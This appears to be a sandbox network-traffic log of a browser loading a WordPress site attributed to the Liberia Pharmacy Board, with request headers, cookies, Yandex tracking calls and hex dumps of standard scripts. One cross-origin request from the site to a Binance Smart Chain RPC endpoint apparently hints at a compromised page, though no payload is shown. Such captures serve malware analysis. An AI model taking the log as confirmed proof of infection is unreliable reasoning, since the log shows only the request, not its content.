                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 2c 43 5b 30 5d 2e 64 61 74 61 73 65 74 2e 73 74 61 74 69 63 7a 2c 61 5b 69 5d 2e 5f 4c 73 68 6f 72 74 63 75 74 73 5b 43 5b 30 5d 2e 69 64 5d 2e 70 29 7d 61 2e 67 41 28 43 5b 30 5d 2c 22 61 63 74 69 6f 6e 73 22 29 26 26 61 2e 63 68 65 63 6b 41 63 74 69 6f 6e 73 26 26 61 2e 63 68 65 63 6b 41 63 74 69 6f 6e 73 28 43 2c 69 2c 61 5b 69 5d 29 2c 21 61 2e 63 68 65 63 6b 56 69 64 65 6f 41 70 69 73 7c 7c 77 69 6e 64 6f 77 2e 72 73 5f 61 64 64 65 64 76 69 6d 26 26 77 69 6e 64 6f 77 2e 72 73 5f 61 64 64 65 64 79 74 7c 7c 61 5b 69 5d 2e 79 6f 75 74 75 62 65 61 70 69 6e 65 65 64 65 64 26 26 61 5b 69 5d 2e 76 69 6d 65 6f 61 70 69 6e 65 65 64 65 64 7c 7c 61 2e 63 68 65 63 6b 56 69 64 65 6f 41 70 69 73 28 43 2c 69 29 7d 61 2e 63 68 65 63 6b 41 63 74 69 6f 6e 73 26 26 61
                                                                                                                        Data Ascii: ,C[0].dataset.staticz,a[i]._Lshortcuts[C[0].id].p)}a.gA(C[0],"actions")&&a.checkActions&&a.checkActions(C,i,a[i]),!a.checkVideoApis||window.rs_addedvim&&window.rs_addedyt||a[i].youtubeapineeded&&a[i].vimeoapineeded||a.checkVideoApis(C,i)}a.checkActions&&a


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        64192.168.2.74986469.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:50 UTC658OUTGET /wp-includes/js/comment-reply.min.js?ver=6.7.1 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:50 UTC367INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:50 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 13 Nov 2024 23:42:19 GMT
                                                                                                                        ETag: "bd2-626d3e2784d0d"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 3026
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:50 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:50 UTC3026INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 77 69 6e 64 6f 77 2e 61 64 64 43 6f 6d 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 76 29 7b 76 61 72 20 49 2c 43 2c 68 2c 45 3d 76 2e 64 6f 63 75 6d 65 6e 74 2c 62 3d 7b 63 6f 6d 6d 65 6e 74 52 65 70 6c 79 43 6c 61 73 73 3a 22 63 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 6c 69 6e 6b 22 2c 63 6f 6d 6d 65 6e 74 52 65 70 6c 79 54 69 74 6c 65 49 64 3a 22 72 65 70 6c 79 2d 74 69 74 6c 65 22 2c 63 61 6e 63 65 6c 52 65 70 6c 79 49 64 3a 22 63 61 6e 63 65 6c 2d 63 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 6c 69 6e 6b 22 2c 63 6f 6d 6d 65 6e 74 46 6f 72 6d 49 64 3a 22 63 6f 6d 6d 65 6e 74 66 6f 72 6d 22 2c 74 65 6d 70 6f 72 61 72 79 46 6f 72 6d 49 64 3a 22 77 70 2d 74
                                                                                                                        Data Ascii: /*! This file is auto-generated */window.addComment=function(v){var I,C,h,E=v.document,b={commentReplyClass:"comment-reply-link",commentReplyTitleId:"reply-title",cancelReplyId:"cancel-comment-reply-link",commentFormId:"commentform",temporaryFormId:"wp-t


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        65192.168.2.74986735.71.137.1054432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:50 UTC507OUTOPTIONS / HTTP/1.1
                                                                                                                        Host: bsc-dataseed.binance.org
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept: */*
                                                                                                                        Access-Control-Request-Method: POST
                                                                                                                        Access-Control-Request-Headers: content-type
                                                                                                                        Origin: https://www.lpb.gov.lr
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:50 UTC469INHTTP/1.1 204 No Content
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:50 GMT
                                                                                                                        Connection: close
                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                        Access-Control-Allow-Headers: *
                                                                                                                        Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Max-Age: 600
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Referrer-Policy: origin-when-cross-origin
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        66192.168.2.74986669.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:50 UTC661OUTGET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.1 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:51 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:51 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Tue, 02 Apr 2024 20:43:58 GMT
                                                                                                                        ETag: "4926-615232a577cfe"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 18726
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:51 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:51 UTC7823INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 74 77 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 76 61 72 20 74 77 65 6d 6f 6a 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3d 7b 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 6a 64 65 63 6b 65 64 2f 74 77 65 6d 6f 6a 69 40 31 35 2e 30 2e 33 2f 61 73 73 65 74 73 2f 22 2c 65 78 74 3a 22 2e 70 6e 67 22 2c 73 69 7a 65 3a 22 37 32 78 37 32 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 65 6d 6f 6a 69 22 2c 63 6f 6e 76 65 72 74 3a 7b 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 3a 66 75 6e 63 74
                                                                                                                        Data Ascii: /*! This file is auto-generated */// Source: wp-includes/js/twemoji.min.jsvar twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:funct
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 64 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 63 5c 75 64 66 66 65 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 65 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 64 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66
                                                                                                                        Data Ascii: ud83c\udffc\u200d\ud83e\udef2\ud83c[\udffb\udffd-\udfff]|\ud83e\udef1\ud83c\udffd\u200d\ud83e\udef2\ud83c[\udffb\udffc\udffe\udfff]|\ud83e\udef1\ud83c\udffe\u200d\ud83e\udef2\ud83c[\udffb-\udffd\udfff]|\ud83e\udef1\ud83c\udfff\u200d\ud83e\udef2\ud83c[\udf
                                                                                                                        2025-01-10 13:54:51 UTC2903INData Raw: 7d 7d 28 29 3b 0a 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 77 70 2d 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 21 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 29 7b 63 2e 77 70 3d 63 2e 77 70 7c 7c 7b 7d 2c 63 2e 77 70 2e 65 6d 6f 6a 69 3d 6e 65 77 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 75 2c 65 3d 63 2e 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 7c 7c 63 2e 57 65 62 4b 69 74 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 7c 7c 63 2e 4d 6f 7a 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 2c 61 3d 63 2e 64 6f 63 75 6d 65 6e 74 2c 74 3d 21 31 2c 72 3d 30 2c 6f 3d 30 3c 63 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 64 65 78 4f 66 28 22 54 72 69 64 65 6e 74 2f 37 2e 30 22 29 3b 66 75 6e
                                                                                                                        Data Ascii: }}();// Source: wp-includes/js/wp-emoji.min.js!function(c,l){c.wp=c.wp||{},c.wp.emoji=new function(){var n,u,e=c.MutationObserver||c.WebKitMutationObserver||c.MozMutationObserver,a=c.document,t=!1,r=0,o=0<c.navigator.userAgent.indexOf("Trident/7.0");fun


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        67192.168.2.74986587.250.251.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:50 UTC1570OUTGET /watch/99162160?wmode=7&page-url=https%3A%2F%2Fwww.lpb.gov.lr%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.134%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.134%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.134%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A0%3Als%3A632894401814%3Ahid%3A756856224%3Az%3A-300%3Ai%3A20250110085448%3Aet%3A1736517288%3Ac%3A1%3Arn%3A547745590%3Arqn%3A1%3Au%3A1736517288271535202%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A6235%3Awv%3A2%3Ads%3A48%2C619%2C732%2C264%2C2544%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1736517279176%3Arqnl%3A1%3Ast%3A1736517290%3At%3ALiberia%20Pharmacy%20Board&t=gdpr(14)clc(0-0-0)rqnt(1)aw(1)rcm(1)cdl(na)eco(42009088)ti(1) HTTP/1.1
                                                                                                                        Host: mc.yandex.com
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Origin: https://www.lpb.gov.lr
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: sync_cookie_csrf=3333922555fake
                                                                                                                        2025-01-10 13:54:51 UTC3055INHTTP/1.1 302 Moved temporarily
                                                                                                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                        Access-Control-Allow-Origin: https://www.lpb.gov.lr
                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                        Connection: Close
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:51 GMT
                                                                                                                        Expires: Fri, 10-Jan-2025 13:54:51 GMT
                                                                                                                        Last-Modified: Fri, 10-Jan-2025 13:54:51 GMT
                                                                                                                        Location: /watch/99162160/1?wmode=7&page-url=https%3A%2F%2Fwww.lpb.gov.lr%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.134%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.134%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.134%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A0%3Als%3A632894401814%3Ahid%3A756856224%3Az%3A-300%3Ai%3A20250110085448%3Aet%3A1736517288%3Ac%3A1%3Arn%3A547745590%3Arqn%3A1%3Au%3A1736517288271535202%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A6235%3Awv%3A2%3Ads%3A48%2C619%2C732%2C264%2C2544%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1736517279176%3Arqnl%3A1%3Ast%3A1736517290%3At%3ALiberia%20Pharmacy%20Board&t=gdpr%2814%29clc%280-0-0%29rqnt%281%29aw%281%29rcm%281%29cdl%28na%29eco%2842009088% [TRUNCATED]
                                                                                                                        Pragma: no-cache
                                                                                                                        Set-Cookie: yabs-sid=592303851736517291; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: i=ZhczPKj1Pp8lae9ib1TlFHUuJH6rvbsWqVPzsKIF/YzrWRf9LlXRFlQZNwaHbc+gmtAcojXRBA+HJxkuMOrmPVcje+w=; Expires=Mon, 08-Jan-2035 13:54:42 GMT; Domain=.yandex.com; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                        Set-Cookie: yandexuid=4571074561736517291; Expires=Mon, 08-Jan-2035 13:54:42 GMT; Domain=.yandex.com; Path=/; Secure; SameSite=None
                                                                                                                        Set-Cookie: yuidss=4571074561736517291; Expires=Sat, 10-Jan-2026 13:54:51 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: ymex=1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; Expires=Sat, 10-Jan-2026 13:54:51 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Set-Cookie: receive-cookie-deprecation=1; Expires=Sat, 10-Jan-2026 13:54:51 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure; HttpOnly; Partitioned
                                                                                                                        Set-Cookie: bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi; Expires=Sat, 10-Jan-2026 13:54:51 GMT; Domain=.yandex.com; Path=/; SameSite=None; Secure
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        2025-01-10 13:54:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        68192.168.2.74986993.158.134.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:51 UTC893OUTGET /sync_cookie_image_start?redirect_domain=mc.yandex.com&token=10611.fXHS7W61Y6QDgz-iN89SHMqW01LOq60hVQ4ZUA2FrU04b5KjMURoB7zeuL92EZhT.tLPpFu6z6BxWNZFxTt2U3r5CCVE%2C HTTP/1.1
                                                                                                                        Host: mc.yandex.ru
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; yandexuid=8715430261736517288; yashr=3268409401736517288
                                                                                                                        2025-01-10 13:54:51 UTC673INHTTP/1.1 302 Moved temporarily
                                                                                                                        Connection: Close
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:51 GMT
                                                                                                                        Location: https://mc.yandex.com/sync_cookie_image_decide?token=10611.fH1OoSXDiCxpBQsjNz70vRcfoRCKnV72el8MOyZYUCNzPInswMVnZDixWZGJbZzcYCAPwYpj7I7oMEJSzlmlYQitO10RILaai2SvrMOULwtXGJey34xqsHUZbXqM2IFP8_R0NmA-LVPKkiCHFbb3UOiiVBU70YuNH0QeJGVsn8wIEyFktKtOCKdV6q2ne-bgGW8rqnWWD7Oz0Wepdc5Mf7W_6AMFUHHic0BLUHtJKnI%2C.6n504nlTozvgH4AdcQ2ltdTO0ZU%2C
                                                                                                                        Set-Cookie: sync_cookie_csrf=1153950801fake; Expires=Fri, 10-Jan-2025 14:04:51 GMT; Domain=.mc.yandex.ru; Path=/; SameSite=None; Secure
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        2025-01-10 13:54:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        69192.168.2.74987569.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:51 UTC504OUTGET /wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:51 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:51 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "cd61-60e9383bc7b56"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 52577
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:51 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:51 UTC7823INData Raw: 2f 2a 0a 20 2a 20 6a 50 6c 61 79 65 72 20 50 6c 75 67 69 6e 20 66 6f 72 20 6a 51 75 65 72 79 20 4a 61 76 61 53 63 72 69 70 74 20 4c 69 62 72 61 72 79 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 70 6c 61 79 65 72 2e 6f 72 67 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 39 20 2d 20 32 30 31 33 20 48 61 70 70 79 77 6f 72 6d 20 4c 74 64 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 0a 20 2a 0a 20 2a 20 41 75 74 68 6f 72 3a 20 4d 61 72 6b 20 4a 20 50 61 6e 61 67 68 69 73 74 6f 6e 0a 20 2a 20 56 65 72 73 69 6f 6e 3a 20 32 2e 35 2e 30 0a 20 2a 20 44 61 74 65 3a
                                                                                                                        Data Ascii: /* * jPlayer Plugin for jQuery JavaScript Library * http://www.jplayer.org * * Copyright (c) 2009 - 2013 Happyworm Ltd * Licensed under the MIT license. * http://opensource.org/licenses/MIT * * Author: Mark J Panaghiston * Version: 2.5.0 * Date:
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 6c 53 63 72 65 65 6e 29 7d 7d 2c 6d 75 74 65 64 3a 7b 6b 65 79 3a 38 2c 66 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 5f 6d 75 74 65 64 28 21 61 2e 6f 70 74 69 6f 6e 73 2e 6d 75 74 65 64 29 7d 7d 2c 76 6f 6c 75 6d 65 55 70 3a 7b 6b 65 79 3a 33 38 2c 66 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 76 6f 6c 75 6d 65 28 61 2e 6f 70 74 69 6f 6e 73 2e 76 6f 6c 75 6d 65 2b 0a 30 2e 31 29 7d 7d 2c 76 6f 6c 75 6d 65 44 6f 77 6e 3a 7b 6b 65 79 3a 34 30 2c 66 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 76 6f 6c 75 6d 65 28 61 2e 6f 70 74 69 6f 6e 73 2e 76 6f 6c 75 6d 65 2d 30 2e 31 29 7d 7d 7d 2c 76 65 72 74 69 63 61 6c 56 6f 6c 75 6d 65 3a 21 31 2c 76 65 72 74 69 63 61 6c 50 6c 61 79 62 61 63 6b 52 61 74 65 3a 21 31 2c 67 6c 6f 62 61 6c 56 6f 6c 75 6d
                                                                                                                        Data Ascii: lScreen)}},muted:{key:8,fn:function(a){a._muted(!a.options.muted)}},volumeUp:{key:38,fn:function(a){a.volume(a.options.volume+0.1)}},volumeDown:{key:40,fn:function(a){a.volume(a.options.volume-0.1)}}},verticalVolume:!1,verticalPlaybackRate:!1,globalVolum
